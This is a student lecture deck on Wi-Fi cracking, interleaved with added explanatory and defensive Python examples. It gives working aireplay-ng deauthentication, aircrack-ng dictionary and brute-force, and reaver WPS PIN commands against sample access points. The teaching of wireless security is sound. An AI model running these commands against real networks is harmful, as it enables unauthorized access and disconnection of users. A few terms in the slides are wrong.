WPA EXPLOITATION IN THE WORLD OF WIRELESS NETWORK, by Hariraj Rathod, 8th sem, Department of Electronics and Communication

Uploaded by buyuanggarende, posted on 25-Sep-2015


Description: WPA Exploitation in the World of Wireless Networks


Hackerz Club v2.0

Wi-Fi (Wireless Fidelity)
Wi-Fi is a popular technology that allows an electronic device to exchange data or connect to the internet wirelessly using radio waves.

Wireless access allows users to connect to the internet from any location within range of a wireless access point.

Some Basic Terms
MAC address or physical address is a unique identifier assigned to network interfaces for communications.

Access point >> Wireless router

SSID (service set identifier) >> Network Name

BSSID (basic service set identification) >> MAC address of the access point

Basic Working
When a user uses wireless internet they generate what are called data packets. Packets are transmitted between the wireless card and the wireless access point via radio waves whenever the computer is connected with the access point.

Basic Working Contd.
Depending on how long the computer is connected, it can generate a certain number of packets per day.

The more users that are connected to one access point, the more packets are generated.

Wireless uses Radio Frequency
2.4 GHz Wi-Fi spectrum

Wireless Encryption

The main source of vulnerability associated with wireless networks is the method of encryption. The different types of wireless encryption are as follows:

WEP, WPA, WPA2

WEP
Stands for Wired Equivalent Privacy.

WEP is recognizable by its key of 10 or 26 hexadecimal digits.

The WEP protocol was not developed by researchers or experts in security and cryptography.

The initial bytes of the key stream depended on just a few bits of the encryption key.

WEP Continued
WEP Encryption Process

ICV: 32-bit integrity check value
IV: initialization vector

WEP Continued
WEP Decryption Process
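The encryption and decryption process outlined on these two slides, as an added Python example that is not part of the original presentation: the per-frame ICV is a CRC-32 of the plaintext, the 24-bit IV is prepended to the shared key to seed RC4, and the receiver re-derives the same keystream from the IV sent in the clear. The example also checks the property that makes the small IV dangerous: two frames encrypted under the same IV share a keystream, so the XOR of their ciphertexts equals the XOR of their plaintexts. The key, IV and plaintexts are constructed values.

```python
"""Added example (not from the slides): the WEP per-frame encryption and
decryption process (RC4 keystream, CRC-32 ICV) and a check of why a
24-bit IV is too small.  Key, IV and plaintexts below are constructed."""
import struct
import zlib


def rc4_keystream(seed: bytes, length: int) -> bytes:
    """Plain RC4 (key scheduling + generation); WEP seeds it with IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + seed[i % len(seed)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Encryption process: ICV = CRC-32(plaintext), then
    (plaintext || ICV) XOR RC4(IV || key).  The IV travels in the clear."""
    assert len(iv) == 3 and len(key) in (5, 13)      # WEP-40 or WEP-104 key
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    body = plaintext + icv
    ks = rc4_keystream(iv + key, len(body))
    return iv + bytes(a ^ b for a, b in zip(body, ks))


def wep_decrypt(key: bytes, frame: bytes):
    """Decryption process: rebuild the keystream from the clear IV, XOR,
    and verify the ICV.  Returns the plaintext, or None if the ICV fails."""
    iv, body = frame[:3], frame[3:]
    ks = rc4_keystream(iv + key, len(body))
    plain_icv = bytes(a ^ b for a, b in zip(body, ks))
    plaintext, icv = plain_icv[:-4], plain_icv[-4:]
    if struct.unpack("<I", icv)[0] != (zlib.crc32(plaintext) & 0xFFFFFFFF):
        return None                                   # frame would be discarded
    return plaintext


def keystream_reuse_leak(key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bool:
    """Same IV => same keystream, so c1 XOR c2 == p1 XOR p2 with no key
    knowledge.  With only 2^24 IVs this repeat is guaranteed on a busy AP."""
    c1 = wep_encrypt(key, iv, p1)[3:]
    c2 = wep_encrypt(key, iv, p2)[3:]
    n = min(len(p1), len(p2))
    xor_cipher = bytes(a ^ b for a, b in zip(c1[:n], c2[:n]))
    xor_plain = bytes(a ^ b for a, b in zip(p1, p2))
    return xor_cipher == xor_plain


if __name__ == "__main__":
    KEY = bytes.fromhex("0102030405")                 # constructed WEP-40 key
    IV = b"\x00\x00\x01"                              # constructed 24-bit IV
    frame = wep_encrypt(KEY, IV, b"hello")
    print(wep_decrypt(KEY, frame))                    # b'hello'
    print(keystream_reuse_leak(KEY, IV, b"attack at dawn", b"defend at noon"))
```

The ICV catches accidental corruption but, being a plain CRC, gives no cryptographic integrity; that and the keystream reuse are the properties the cryptanalysis on the next slide exploits.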

With multiple wireless clients sending a large amount of data, an attacker can remotely capture large amounts of WEP ciphertext and use cryptanalysis methods to determine the WEP key.

WPA or WPA2
Stands for Wi-Fi Protected Access

Created to provide stronger security

Still able to be cracked if a short password is used.

If a long passphrase or password is used, these protocols are virtually uncrackable.

WPA-PSK with TKIP (Temporal Key Integrity Protocol) or AES (Advanced Encryption Standard) uses a Pre-Shared Key (PSK) that is more than 7 and less than 64 characters in length.

WPS (WiFi Protected Feature): a simple plug-and-play feature.

Using Backtrack
Some Basic Backtrack Terms
wlan1 >> wireless interface
mon0 >> monitor-mode interface
Handshake >> the negotiation process between the computer and a WiFi server using WPA encryption. Needed to crack WPA/WPA2.
Dictionary >> a list of common passwords.
.cap file >> used to store captured packets.

Monitor Mode
Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received from the wireless network.

Monitor mode allows packets to be captured without having to associate with an access point first.

Tools Used
Airmon-ng >> Places different cards in monitor mode.

Airodump-ng (packet sniffer) >> Tool used to listen to wireless routers in the area.

Aireplay-ng (packet injector) >> Aireplay-ng is used to inject frames. Its primary function is to generate traffic for later use in aircrack-ng for cracking the WEP and WPA-PSK keys.

Aircrack-ng >> Cracks WEP and WPA (dictionary attack) keys.

Tools Used Continued
Word Field (brute force)

Reaver Tool (brute force)

Aircrack-ng
Selecting the interface to put it in monitor mode. Command used:

airmon-ng start wlan1

Aircrack-ng Continued
Start capturing packets:

airodump-ng mon0

airodump-ng --channel 1 --bssid <MAC of the access point> -w reddot mon0

where "--channel" locks the card to the channel of the target access point, "--bssid" limits the capture to that access point and "-w reddot" writes the capture to files named reddot-NN.cap.

Aircrack-ng Continued
Deauthenticate the device connected to the access point and force it to re-exchange the WPA key.

aireplay-ng -0 4 -a F4:EC:38:BA:6C:44 -c 90:4C:E5:B2:6F:D8 mon0

where "-0 4" tells aireplay-ng to inject deauthentication packets (4 of them), "-a" is the wireless access point MAC address and "-c" is the client (victim) MAC address.
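The deauthentication step above works because 802.11 management frames carry no authentication unless the network enables 802.11w Protected Management Frames, so a defender who runs a monitor-mode sensor can only detect the burst after the fact. The following detector is an added example and not part of the original presentation: it walks a constructed frame log (timestamp, frame subtype, source, destination, BSSID; the field layout, MAC addresses, window and threshold are this example's own assumptions) and flags any client that receives a burst of deauthentication frames within a short window, which is exactly the pattern the four injected frames produce.

```python
"""Added example (not from the slides): a defender-side detector for the
deauthentication burst that the aireplay-ng step produces.  The capture
below is constructed; field names, addresses and the threshold are this
example's own assumptions."""
from collections import defaultdict, deque

# Constructed capture as (time in seconds, subtype, source, destination, bssid).
# In a real capture "deauth" is management subtype 12 and "beacon" is subtype 8.
FRAMES = [
    (0.00, "beacon", "02:aa:bb:cc:dd:01", "ff:ff:ff:ff:ff:ff", "02:aa:bb:cc:dd:01"),
    (0.10, "data",   "02:11:22:33:44:55", "02:aa:bb:cc:dd:01", "02:aa:bb:cc:dd:01"),
    (5.00, "deauth", "02:aa:bb:cc:dd:01", "02:11:22:33:44:55", "02:aa:bb:cc:dd:01"),
    (5.02, "deauth", "02:aa:bb:cc:dd:01", "02:11:22:33:44:55", "02:aa:bb:cc:dd:01"),
    (5.04, "deauth", "02:aa:bb:cc:dd:01", "02:11:22:33:44:55", "02:aa:bb:cc:dd:01"),
    (5.06, "deauth", "02:aa:bb:cc:dd:01", "02:11:22:33:44:55", "02:aa:bb:cc:dd:01"),
    # client reassociates; the 4-way handshake would follow here
    (5.30, "data",   "02:11:22:33:44:55", "02:aa:bb:cc:dd:01", "02:aa:bb:cc:dd:01"),
    # a single deauth to another client, as an AP does on idle timeout
    (60.0, "deauth", "02:aa:bb:cc:dd:01", "02:66:77:88:99:00", "02:aa:bb:cc:dd:01"),
]


def find_deauth_bursts(frames, window=2.0, threshold=3):
    """Flag (bssid, client) pairs that receive at least `threshold`
    deauthentication frames inside any sliding window of `window` seconds.
    Returns a list of (bssid, client, first_time, count) tuples; `count` is
    the number of deauths in the window when the burst was last observed."""
    recent = defaultdict(deque)     # (bssid, client) -> timestamps in window
    alerts = {}
    for t, subtype, src, dst, bssid in sorted(frames):
        if subtype != "deauth":
            continue
        key = (bssid, dst)
        q = recent[key]
        q.append(t)
        while q and t - q[0] > window:      # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold:
            alerts[key] = (bssid, dst, q[0], len(q))
    return list(alerts.values())


if __name__ == "__main__":
    for bssid, client, first, count in find_deauth_bursts(FRAMES):
        print(f"deauth burst: ap={bssid} client={client} "
              f"started_at={first:.2f}s frames={count}")
```

A single deauthentication frame is normal AP behaviour, so the detector keys on rate rather than presence; the mitigation that removes the problem rather than just observing it is enabling 802.11w (PMF) on the access point and clients.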

Aircrack-ng Continued
Authentication process in WPA

Aircrack-ng Continued
4-way handshake is captured.

Aircrack-ng Continued
Cracking the WPA key using aircrack-ng, the dictionary file and the captured 4-way handshake file reddot-01.cap:

aircrack-ng -w /home/pranav/download/password.lst -b F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap

where "-w" specifies the dictionary file to use and "-b" the BSSID of the access point.

John the Ripper
Faster than the previously used tool.

/pentest/password/john-1.7.6.jumbo12/run/john --stdout --incremental:all | aircrack-ng -b 00:17:9A:82:44:1B -w - /home/pranav/test-01.cap

where "-w -" makes aircrack-ng read candidate passphrases from standard input.

Word Field
Word Field is a brute-force attack. Command line used:

wordfield [OPTION...] MINLENGTH [MAXLENGTH]

"wordfield -a -n 8 8" will output all possible alphanumeric strings which are 8 characters long.

wordfield -a -n 8 8 | aircrack-ng -b 00:17:9A:82:44:1B -w - /home/pranav/Wifire-02.cap

This attack is really effective on weak keys.

Word Field Continued
The run shown on the slide took 22 hours, 7 minutes and 35 seconds.

Dictionary and Brute Force Limitations
The passphrase will not necessarily be found in a dictionary list, so the dictionary attack has its limitations.
Brute-force techniques require a lot of fast hardware computational power.
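The two limitations above, and the earlier statement that WPA/WPA2 with a long passphrase is virtually uncrackable, both come down to one fact: the captured handshake lets an attacker test a guess offline, but every guess costs a full PMK derivation, and the passphrase space grows exponentially with length. The following Python is an added example, not from the presentation. The PMK derivation is the standard WPA/WPA2-PSK one (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 256-bit output); the small common-password list, the guess rates and the policy function are this example's own constructed assumptions for a defender checking passphrase strength.

```python
"""Added example (not from the slides): WPA/WPA2-PSK key derivation, the
size of a brute-force search, and a defender-side passphrase check.  The
derivation is the standard 802.11i one; the wordlist, rates and policy
rules are constructed assumptions."""
import hashlib
import string

# Constructed common-password list standing in for a dictionary file.
COMMON_PASSWORDS = {"password", "12345678", "qwertyuiop", "iloveyou"}


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The 4-way handshake proves possession of this key, so each offline
    guess against a captured handshake costs one of these derivations."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA-PSK passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("ascii"), 4096, 32)


def keyspace(alphabet_size: int, min_len: int, max_len: int) -> int:
    """Number of candidates a brute-force run covers, e.g. 62**8 for the
    8-character alphanumeric wordfield run on the previous slides."""
    return sum(alphabet_size ** n for n in range(min_len, max_len + 1))


def seconds_to_exhaust(space: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a given guess rate."""
    return space / guesses_per_second


def passphrase_policy(passphrase: str, wordlist=COMMON_PASSWORDS) -> list:
    """Defender-side check: WPA length rule, not in a common-password list,
    and at least three character classes.  Returns the list of problems."""
    problems = []
    if not 8 <= len(passphrase) <= 63:
        problems.append("length must be 8..63 characters")
    if passphrase.lower() in wordlist:
        problems.append("appears in common-password list")
    classes = (string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation)
    if sum(any(c in cls for c in passphrase) for cls in classes) < 3:
        problems.append("use at least three character classes")
    return problems


if __name__ == "__main__":
    # Known 802.11i test vector: passphrase "password", SSID "IEEE".
    print(wpa_pmk("password", "IEEE").hex())
    # 8 alphanumeric characters at a constructed 100,000 guesses/second
    # (a high rate for a CPU, since each guess is 4096 HMAC-SHA1 rounds).
    days = seconds_to_exhaust(keyspace(62, 8, 8), 100_000) / 86400
    print(f"62^8 candidates at 1e5 guesses/s: {days:,.0f} days worst case")
    print(passphrase_policy("password"))
    print(passphrase_policy("Correct-Horse-9-Battery"))
```

The constructed guess rate is only there to make the arithmetic visible; the conclusion the slides draw holds for any rate, because adding one random character multiplies the work by the alphabet size while the defender's cost stays constant.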

Source: http://lastbit.com/pswcalc.asp

Reaver Tool
Reaver is a fantastic tool to crack the WPS PIN, written by Craig Heffner. This tool exploits the 8-digit WPS PIN. 1 bit is a checksum bit; 7 unknown numbers, meaning there are 10^7 (10,000,000) possible combinations, which would take approximately 116 days to break at 1 attempt every second.

Reaver Tool Continued
WPS PIN 65020920

Reaver Tool Continued
Finding a WPS-enabled target:

wash -i mon0

Reaver Tool Continued
Cracking technique
WPS PIN 6502-0920
First half: 10^4 (10,000) combinations. Second half: since the 1st bit is a checksum bit, the combinations reduce to 10^3 (1,000). This reduces the time required to break the PIN to just over 3 hours, again assuming that 1 attempt is made every second.
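The arithmetic on this slide, as an added Python example that is not from the presentation: the eighth digit of a Wi-Fi Protected Setup PIN is a checksum computed from the first seven (the weighting rule is the one in the WPS specification), and because the registrar exchange confirms the first four digits separately from the last three, the candidate count drops from 10^7 to 10^4 + 10^3 = 11,000. The sample PIN is the one on the slide; the function names are this example's own.

```python
"""Added example (not from the slides): why the WPS PIN space collapses.
The checksum rule is from the WPS specification; the sample PIN is the
one on the slide; function names are this example's own."""


def wps_checksum_digit(first7: str) -> int:
    """Checksum digit: weight the 7 digits 3,1,3,1,3,1,3 (left to right),
    sum, and return the digit that brings the total to a multiple of 10."""
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("need exactly 7 decimal digits")
    total = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first7))
    return (10 - total % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if the 8-digit PIN's last digit matches the checksum rule."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum_digit(pin[:7])


def candidate_count(halves_confirmed_separately: bool) -> int:
    """Size of an exhaustive online guess.  10^7 if all seven free digits
    had to be guessed at once; 10^4 + 10^3 when the access point confirms
    the first half before the second half is ever sent."""
    if halves_confirmed_separately:
        return 10 ** 4 + 10 ** 3
    return 10 ** 7


def hours_at_one_guess_per_second(count: int) -> float:
    """Worst-case time at the slide's assumed rate of one attempt per second."""
    return count / 3600


if __name__ == "__main__":
    print(wps_checksum_digit("6502092"))                     # 0, matching 65020920
    print(is_valid_wps_pin("65020920"))                      # True
    print(candidate_count(False), candidate_count(True))     # 10000000 11000
    print(round(hours_at_one_guess_per_second(11000), 2))    # 3.06
```

The checksum only makes the PIN self-consistent, it adds no secrecy, and the split confirmation is a protocol design flaw rather than an implementation bug, so the effective fix on the defender's side is to disable the WPS PIN method on the access point rather than to pick a different PIN.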

Reaver Tool Continued

reaver -i mon0 -b F4:EC:38:BA:6C:44

where "-i" is the monitor-mode interface and "-b" the BSSID of the access point.

Reaver Tool Continued

Be secured

References
Wi-Fi security: WEP, WPA and WPA2, Guillaume Lehembre
http://en.wikipedia.org/wiki/Wi-Fi_Protected_Access#WPS_PIN_recovery
https://sites.google.com/site/clickdeathsquad/Home/cds-wpacrack
http://samiux.blogspot.in/2010/04/howto-crackwpawpa2-psk-with-john.html
http://www.zer0trusion.com/2011/09/crackingwpa-without-dictionary.html
Tactical Network Solutions
WiFi Security Megaprimer by Vivek Ramchandran

Thanks : )